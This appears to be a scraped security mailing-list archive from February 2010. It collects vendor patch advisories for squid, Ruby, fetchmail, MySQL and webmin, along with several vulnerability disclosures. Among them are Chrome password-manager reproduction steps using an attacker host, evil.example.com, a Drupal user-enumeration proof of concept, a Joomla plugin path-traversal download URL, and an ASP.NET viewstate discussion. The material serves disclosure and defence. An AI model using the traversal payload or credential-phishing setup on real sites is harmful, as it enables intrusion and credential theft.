http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.6.18-1ubuntu3.1.diff.gz
  Size/MD5:   300822 a117f6c4aca9a0a1c592f446b7fe04fd

http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.6.18-1ubuntu3.1.dsc
  Size/MD5:  806 3619367bb8824288a5f4c58a51ddc3b2
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.6.18.orig.tar.gz
  Size/MD5:  1725660 d7ff75f7b75ba7bc28ea453fe4b94434

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.6.18-1ubuntu3.1_all.deb
  Size/MD5:   482290 21e970822bc7e4f3f0eb62a82857dd62

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)

2010-02-16 Thread VSR Advisories

   Virtual Security Research, LLC.
  http://www.vsecurity.com/
  Security Advisory


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Chrome Password Manager Cross Origin Weakness
 Release Date: 2010-02-15
  Application: Google Chrome Web Browser
 Versions: 4.0.249.78, 3.0.195.38, and likely earlier
 Severity: Medium/Low
   Author: Timothy D. Morgan 
Vendor Status: Update Released [2]
CVE Candidate: CVE-2010-0556
Reference: http://www.vsecurity.com/resources/advisory/20100215-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
"Google Chrome is a web browser that runs web pages and applications with
 lightning speed." [1]


Vulnerability Overview
--
In mid-January, VSR identified a vulnerability in Google Chrome which could be
used in phishing attacks in specific types of web sites.  This issue may make it
much easier to convince a victim to submit web application credentials to the
attacker's site.


Vulnerability Details
-
As with many modern browsers, Google Chrome implements a password manager to
help users keep track of credentials used on various web sites.  It may be used
to store either HTTP authentication credentials or form-based credentials.

The vulnerability surfaces in a situation where a user visits a web page which
includes an embedded object, such as an image, from a third-party site.  If an
attacker had control of the third-party web server, he could request credentials
from the user via HTTP authentication.  This style of attack has been documented
in the past, and some of variations on this theme are explored in a recent paper
by VSR [5].

However, in the case of vulnerable versions of Google Chrome, the password
manager may pre-fill the authentication dialog box with credentials intended for
parent page's domain, leaving users one click away from account compromise. 
This issue would affect Chrome users which use applications that allow users to
embed objects from third parties.  Examples of such applications may include
message boards, blogs, or social networking sites.

The following steps may be used to reproduce the issue:

1. Set up an HTML page with the following contents:
   
 http://evil.example.com/image.png"; />
   

   This page should not be protected by any authentication and should be hosted
   at: 
 http://victim.example.org/test-img.html


2. Set up an HTTP digest protected area under the following URL:
   http://victim.example.org/private/


3. Set up the attacker's server to be protected by HTTP authentication such that
   the following URL is protected: 
   http://evil.example.com/image.png


4. Use Google Chrome to log in to an area protected with HTTP authentication,
   such as:
   http://victim.example.org/private

   Save the password in the password manager.


5. Finally, access the unauthenticated HTML page on the victim's server:
   http://victim.example.org/test-img.html
 
   Since the embedded image requires authentication, a password prompt should
   appear.  In vulnerable versions of Google Chrome, this form will be
   pre-filled with the stored credentials from the victim.example.org domain,
   even though the password prompt is generated by evil.example.com.



Versions Affected
-
The issue was originally discovered in version 3.0.195.38 and was also verified
to exist in version 4.0.249.78.  Testing was conducted on the Windows platform.


Vendor Response
---
The following timeline details Google's response to the reported issue:

2010-01-20VSR submitted a security bug report [3].  Chromium development
  team began researching the issue.

2010-01-21VSR provided additional details on the test scenario.  Chromium
  developers successfully reproduced the issue and committed a fix
  to the source repository [4].

2010-02-10Chrome stable version 4.0.249.89 released which includes the fix.

2010-02-15VSR advisory released.



Recommendation
--
Upgrade to the latest version of Google Chrome as soon as possible.

Users are advised to be wary of HTTP authentication prompts and to carefully
inspect the domains presented in these messages to see if they match the domain
of the expected site.



Common Vulnerabilities and Exposures (CVE) Information
--
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-0556 to this issue.  This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements

Thanks to the Chromium development team for the prompt response.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. htt

Information disclosure vulnerability in Drupal's Realname User Reference Widget contributed module (version 6.x-1.0)

2010-02-16 Thread Martin Barbella
Information disclosure vulnerability in Drupal's Realname User Reference
Widget contributed module (version 6.x-1.0)
 
Discovered by Martin Barbella 
 
Description of Vulnerability:
-
Drupal is a free software package that allows an individual or a
community of users to easily publish, manage and organize a wide variety
of content on a website (http://drupal.org/about).
 
The Realname CCK User Reference Widget module adds a new widget to the
User Reference CCK field type that uses the Realnames for autocompletion
(http://drupal.org/project/realname_userreference).
 
Only the access content permission is needed to access the page which
displays the user names and real names for users, used by the
autocompletion widget, resulting in an information disclosure
vulnerability.
 
Systems affected:
-
This has been confirmed in version 6.x-1.0 of the Realname User
Reference Widget module.
 
Impact:
---
This would allow an attacker to collect user names for brute force
attacks, or real names of users for targeted phishing.
 
Mitigating factors:
---
A user must have the access content permission to exploit this
vulnerability, though in most cases even anonymous users would have this
permission.
 
Proof of concept:
-
1. Install the module and its dependencies
2. Configure Realname
3. As any user with access content, visit
realnameuserreference/autocomplete or
realnameuserreference/autocomplete/
4. Note that real names and usernames can be gathered from the output
 
Timeline:
-
2010-02-01 - Drupal Security notified
2010-02-16 - Still no response from Drupal Security
2010-02-16 - Public disclosure


[USN-900-1] Ruby vulnerabilities

2010-02-16 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-900-1  February 16, 2010
ruby1.9 vulnerabilities
CVE-2009-1904, CVE-2009-4124, CVE-2009-4492
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  libruby1.9  1.9.0.2-7ubuntu1.3
  ruby1.9 1.9.0.2-7ubuntu1.3

Ubuntu 9.04:
  libruby1.9  1.9.0.2-9ubuntu1.2
  ruby1.9 1.9.0.2-9ubuntu1.2

Ubuntu 9.10:
  libruby1.9  1.9.0.5-1ubuntu1.2
  ruby1.9 1.9.0.5-1ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Emmanouel Kellinis discovered that Ruby did not properly handle certain
string operations. An attacker could exploit this issue and possibly
execute arbitrary code with application privileges. (CVE-2009-4124)

Giovanni Pellerano, Alessandro Tanasi, and Francesco Ongaro discovered that
Ruby did not properly sanitize data written to log files. An attacker could
insert specially-crafted data into log files which could affect certain
terminal emulators and cause arbitrary files to be overwritten, or even
possibly execute arbitrary commands. (CVE-2009-4492)

It was discovered that Ruby did not properly handle string arguments that
represent large numbers. An attacker could exploit this and cause a denial
of service. This issue only affected Ubuntu 9.10. (CVE-2009-1904)


Updated packages for Ubuntu 8.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2-7ubuntu1.3.diff.gz
  Size/MD5:55028 348a5acc2d4cd7140db6e559b61dcd65

http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2-7ubuntu1.3.dsc
  Size/MD5: 1772 d97af9578cccd57bd0478b24c4a15bbd

http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2.orig.tar.gz
  Size/MD5:  6407910 2a848b81ed1d6393b88eec8aa6173b75

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/irb1.9_1.9.0.2-7ubuntu1.3_all.deb
  Size/MD5:57858 469d331bfeb1828bcb883681a7644e57

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/rdoc1.9_1.9.0.2-7ubuntu1.3_all.deb
  Size/MD5:   112270 146debd3794502eaf8e150c4f4d7e4c0

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/ri1.9_1.9.0.2-7ubuntu1.3_all.deb
  Size/MD5:   972126 e38db5ccb627c08fa6218f8c2eeb10fa

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/ruby1.9-elisp_1.9.0.2-7ubuntu1.3_all.deb
  Size/MD5:31506 2a605b2bea6de3c30cb7a663e08e8c05

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/ruby1.9-examples_1.9.0.2-7ubuntu1.3_all.deb
  Size/MD5:64772 207c3c3409a49b341b5e9a2616fa7641

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9-dbg_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:  2114692 67f4ca5d88d85feeefe632e850e16eff

http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:  2276448 8f1a9b613c078ba0b74ef8f0a3e4f826

http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9-dev_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:   943466 4180d671414cdedbe170ab4709448a50

http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:26530 5ba45139014fd73a573e0759c56b1008

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libdbm-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:12556 3e1f3dc7bd6fa475f8f982b6ce5e690f

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libgdbm-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:11838 fbce05244095fd098d2296038166cf2d

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libopenssl-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:   134348 8ec8a5fbdaebd9e3a6be2d6a3d929418

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libreadline-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:11650 c359b94a5b795e208ffdf3c4678f44cd

http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libtcltk-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb
  Size/MD5:  1745694 f5932e13af1f755fe4c8b2006ff79d76

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9-dbg_1.9.0.2-7ubuntu1.3_i386.deb
  Size/MD5:  1921832 35049ad6802242d7b15a612c8e1c49b7

http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9_1.9.0.2-7ubuntu1.3_i386.deb
  Size/MD5:  2128332 732aea07d60e5d51b109ab1ec9255841

http://s

[ MDVSA-2010:037 ] fetchmail

2010-02-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:037
 http://www.mandriva.com/security/
 ___

 Package : fetchmail
 Date: February 16, 2010
 Affected: 2010.0
 ___

 Problem Description:

 A vulnerability have been discovered and corrected in fetchmail:
 
 The sdump function in sdump.c in fetchmail 6.3.11, 6.3.12, and 6.3.13,
 when running in verbose mode on platforms for which char is signed,
 allows remote attackers to cause a denial of service (application
 crash) or possibly execute arbitrary code via an SSL X.509 certificate
 containing non-printable characters with the high bit set, which
 triggers a heap-based buffer overflow during escaping (CVE-2010-0562).
 
 This update provides fetchmail 6.3.14, which is not vulnerable to
 this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0562
 http://www.fetchmail.info/fetchmail-SA-2010-01.txt
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 d8d72bfeb0a3f4db1760728f495a2de9  
2010.0/i586/fetchmail-6.3.14-0.1mdv2010.0.i586.rpm
 b58db1070a6efcd9d28ffc89f66b544c  
2010.0/i586/fetchmailconf-6.3.14-0.1mdv2010.0.i586.rpm
 b794d75bdab692813b345f32a9969658  
2010.0/i586/fetchmail-daemon-6.3.14-0.1mdv2010.0.i586.rpm 
 f8be812911fb7f7042b981e8c2ad1094  
2010.0/SRPMS/fetchmail-6.3.14-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 b56fed87fa44e6d446be4135b322e9d3  
2010.0/x86_64/fetchmail-6.3.14-0.1mdv2010.0.x86_64.rpm
 6d8d033e916b62f700e68b27d55e0c5b  
2010.0/x86_64/fetchmailconf-6.3.14-0.1mdv2010.0.x86_64.rpm
 09b165f3e522197967d5b05317a1d92e  
2010.0/x86_64/fetchmail-daemon-6.3.14-0.1mdv2010.0.x86_64.rpm 
 f8be812911fb7f7042b981e8c2ad1094  
2010.0/SRPMS/fetchmail-6.3.14-0.1mdv2010.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLemFtmqjQ0CJFipgRArz6AJ9tQaqkzAvzTZlgtT9BIFJFE6SD1QCeMU9r
vxGTHsLKs6WOax3plmPFSGQ=
=7tik
-END PGP SIGNATURE-



Joomla (Jw_allVideos) Remote File Download Vulnerability

2010-02-16 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#
# Vulnerability:
# 
http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities

2010-02-16 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1997-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
February 14, 2010 http://www.debian.org/security/faq
- 

Package: mysql-dfsg-5.0
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-4019 CVE-2009-4030 CVE-2009-4484

Several vulnerabilities have been discovered in the MySQL
database server.
The Common Vulnerabilities and Exposures project identifies the
following problems:


CVE-2009-4019

Domas Mituzas discovered that mysqld does not properly handle errors during
execution of certain SELECT statements with subqueries, and does not preserve
certain null_value flags during execution of statements that use the
GeomFromWKB function, which allows remote authenticated users to cause a
denial of service (daemon crash) via a crafted statement.


CVE-2009-4030

Sergei Golubchik discovered that MySQL allows local users to bypass certain
privilege checks by calling CREATE TABLE on a MyISAM table with modified
DATA DIRECTORY or INDEX DIRECTORY arguments that are originally associated
with pathnames without symlinks, and that can point to tables created at
a future time at which a pathname is modified to contain a symlink to a
subdirectory of the MySQL data home directory.


CVE-2009-4484

Multiple stack-based buffer overflows in the CertDecoder::GetName function
in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld, allow
remote attackers to execute arbitrary code or cause a denial of service
(memory corruption and daemon crash) by establishing an SSL connection and
sending an X.509 client certificate with a crafted name field.


For the oldstable distribution (etch), these problems have been fixed in
version 5.0.32-7etch12

For the stable distribution (lenny), these problems have been fixed in
version 5.0.51a-24+lenny3

The testing (squeeze) and unstable (sid) distribution do not contain
mysql-dfsg-5 anymore.

We recommend that you upgrade your mysql-dfsg-5.0 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.dsc
Size/MD5 checksum: 1128 4887f5693757fbbc2584e86ab5e91bf3
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.diff.gz
Size/MD5 checksum:   315292 3d1c00f7b70032c11803fa391bee026a
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz
Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch12_all.deb
Size/MD5 checksum:48912 f937a118691e4325dac3a5a8e98eeb50
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch12_all.deb
Size/MD5 checksum:55892 6f34fbec1b8e451172ebd24f80439a9e
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch12_all.deb
Size/MD5 checksum:46842 daa1649e464ebdbbd54170fb571782ea

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_alpha.deb
Size/MD5 checksum:  1947910 6e23852721ab3b2a95d1b3113a533212
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_alpha.deb
Size/MD5 checksum:48900 c53c847af88a0423a09b9f68ba261859
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_alpha.deb
Size/MD5 checksum:  8906528 64427684814af516902d10adb5c85de2
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_alpha.deb
Size/MD5 checksum:  8406242 204adae2eab5bfb665728ea7257631f0
  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_alpha.deb
Size/MD5 checksum: 27248640 ee4b566619b0e560dcbf0632f8b0cc0e

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_amd64.deb
Size/MD5 ch

RE: Trustwave's SpiderLabs Security Advisory TWSL2010-001

2010-02-16 Thread David Byrne
I respectfully defend our statement as very realistic. The .Net exploit 
provided in the advisory is all that is required to work; no code-behind is 
required because the vulnerability related to "innerhtml" lies in the .Net 
code. 

The specific flaw is actually in 
System.Web.UI.HTMLControls.HtmlContainerControl class, which is the super class 
of the HTMLForm control (among others). The bug is easy to spot in the 
LoadViewState method as revealed in .Net Reflector:


protected override void LoadViewState(object savedState)
{
if (savedState != null)
{
base.LoadViewState(savedState);
string text = (string) this.ViewState["innerhtml"];
if (text != null)
{
this.Controls.Clear();
this.Controls.Add(new LiteralControl(text));
}
}
}

 
For those not familiar with C#, the .Net class takes the "innerhtml" value from 
the view state and adds it as a LiteralControl (basically literal HTML) in its 
"Controls" collection. When the HtmlContainerControl object is rendered, it 
will take that LiteralControl and place HTML directly into the response body. 

The other .Net-defined subclasses of HtmlContainerControl are listed below:
HtmlAnchor
HtmlButton
HtmlGenericControl
HtmlHead
HtmlSelect
HtmlTable
HtmlTableCell
ListViewTableCell
HtmlTableRow
ListViewTableRow
HtmlTextArea


There are other .Net controls that take properties from the view state that may 
also be vulnerable. Enumerating them is not very helpful because the solution 
will always be the same: secure the view state.

Regarding the articles you linked to, I am familiar with Scott Mitchell's. It 
is a great document, but the vulnerabilities he references have to do with 
custom use of the view state, not specific flaws inherent in the .Net view 
state. As we mentioned in the advisory, technically this is a known issue in 
.Net, although a proof of concept attack against the framework has (to our 
knowledge) not been documented before.

I've also read Michal Zalewski's advisory. It stands out as (I think) the first 
specific attacks documented against .Net's view state. However, they are of a 
different nature than the attack documented in our advisory. 

Sacha Faust's post on encoding controls is a useful reference, but isn't 
directly relevant to view state attacks. The list is of properties that will 
automatically HTML encode when the programmer sets the value. This isn't 
necessarily the same as when the value is set in the view state. 


Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
Email: dby...@trustwave.com



-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Chris Weber
Sent: Thursday, February 11, 2010 3:43 PM
To: Trustwave Advisories; webapp...@lists.securityfocus.com; 
websecur...@webappsec.org; full-disclos...@lists.grok.org.uk; 
bugtraq@securityfocus.com
Subject: [Full-disclosure] (resend) RE: [WEB SECURITY] Trustwave's SpiderLabs 
Security Advisory TWSL2010-001

The key part of the advisory for me wasn't VIEWSTATE as much as it was the 
controls, but this statement you made seemed pretty outrageous (with regard to 
ASP.NET):

   'These vulnerabilities show that unsigned client-side viewstates will ALWAYS 
result in a vulnerability in the affected products.'

I would disagree - it depends how the software developer implemented use of the 
VIEWSTATE's content.  In ASP.NET, the interesting part here was that you 
appeared to be controlling an innerhtml property of a Form control through the 
VIEWSTATE.  What your example didn't show, I'm assuming, is some code behind 
that pulled out the  and set the value in the form's innerHtml 
property/attribute. That's just dangerous coding, akin to trusting client-side 
input and no different than acting on client input that came from any method, 
form input, JSON, etc.  Your repro was a bit confusing/misleading without that 
part.  Otherwise, were you saying that some controls inherently populate their 
properties/attributes from VIEWSTATE content automagically?  

There have been past discussions on VIEWSTATE's security:

Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12

Michal Zalewski reported some exploit scenarios with replay and DoS through 
VIEWSTATE.
http://seclists.org/bugtraq/2005/May/27

You made a reference to how other controls are also vulnerable to this attack.  
I think that data would be more useful in the advisory.  

Yes there do exist ASP.NET controls which don't properly encode, and I would 
refer readers to Sacha Faust's FxCop rule which finds those dangerous controls:

http://blogs.msdn.com/sfaust/archive/2008/09/18/fxcop-htmlspotter-spotting-asp-net-xss-using-fxcop-and-html-enco

[ MDVSA-2010:036 ] webmin

2010-02-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:036
 http://www.mandriva.com/security/
 ___

 Package : webmin
 Date: February 12, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 This advisory updates webmin to the latest version 1.500, fixing
 several bugs and a cross-site scripting issue which allows remote
 attackers to inject arbitrary web script or HTML via unspecified
 vectors (CVE-2009-4568).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4568
 https://qa.mandriva.com/27789
 https://qa.mandriva.com/57313
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 b88f1d3028ca388871749239e3e79cea  
2008.0/i586/webmin-1.500-0.1mdv2008.0.noarch.rpm 
 34a5855e42db94562e5c761eafc670b2  
2008.0/SRPMS/webmin-1.500-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 2d5291bb5442c731df295dd3069a0992  
2008.0/x86_64/webmin-1.500-0.1mdv2008.0.noarch.rpm 
 34a5855e42db94562e5c761eafc670b2  
2008.0/SRPMS/webmin-1.500-0.1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 66f4e3022e6a29251a2eb168ffc6a8f2  
2009.0/i586/webmin-1.500-0.1mdv2009.0.noarch.rpm 
 c4409738f348158e2ce658d0a15d7ec4  
2009.0/SRPMS/webmin-1.500-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 787357fee03e87c947950a81810cd144  
2009.0/x86_64/webmin-1.500-0.1mdv2009.0.noarch.rpm 
 c4409738f348158e2ce658d0a15d7ec4  
2009.0/SRPMS/webmin-1.500-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 6223395569561fb4b6a672845cb8b65b  
2009.1/i586/webmin-1.500-0.1mdv2009.1.noarch.rpm 
 cf4acdf1d4f59dd6ab9aabb5b788eb27  
2009.1/SRPMS/webmin-1.500-0.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 b0d876823caf79b95a4d305f84c42a2f  
2009.1/x86_64/webmin-1.500-0.1mdv2009.1.noarch.rpm 
 cf4acdf1d4f59dd6ab9aabb5b788eb27  
2009.1/SRPMS/webmin-1.500-0.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 1e3ffa22a40379a6f118f30119240e8e  
2010.0/i586/webmin-1.500-0.1mdv2010.0.noarch.rpm 
 2e88506b60faa5223e70b3585df61eb8  
2010.0/SRPMS/webmin-1.500-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 de1a0b9c0235b41883d687aa5fd0350a  
2010.0/x86_64/webmin-1.500-0.1mdv2010.0.noarch.rpm 
 2e88506b60faa5223e70b3585df61eb8  
2010.0/SRPMS/webmin-1.500-0.1mdv2010.0.src.rpm

 Corporate 4.0:
 6d07714084dc6e0875611caddfdf246a  
corporate/4.0/i586/webmin-1.500-0.1.20060mlcs4.noarch.rpm 
 70112c7ab9c9daf264e4b3323205ce62  
corporate/4.0/SRPMS/webmin-1.500-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 1b4c25195e933099b2600c1355640ed0  
corporate/4.0/x86_64/webmin-1.500-0.1.20060mlcs4.noarch.rpm 
 70112c7ab9c9daf264e4b3323205ce62  
corporate/4.0/SRPMS/webmin-1.500-0.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 b581fd765d6a315b4e4a8b0b7b28a900  mes5/i586/webmin-1.500-0.1mdvmes5.noarch.rpm 
 e567172b5df7af353b6c58d9e49458cd  mes5/SRPMS/webmin-1.500-0.1mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 7c49770e4de6369281ede8c9e0c1d7ce  
mes5/x86_64/webmin-1.500-0.1mdvmes5.noarch.rpm 
 e567172b5df7af353b6c58d9e49458cd  mes5/SRPMS/webmin-1.500-0.1mdvmes5.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLdZUjmqjQ0CJFipgRAixXAKDLbMOL8yCg4XbXMaMJEnWRDSttfACeNEqf
E9bqunCxP3hQrWj0XGnsOlc=
=+mw5
-END PGP SIGNATURE-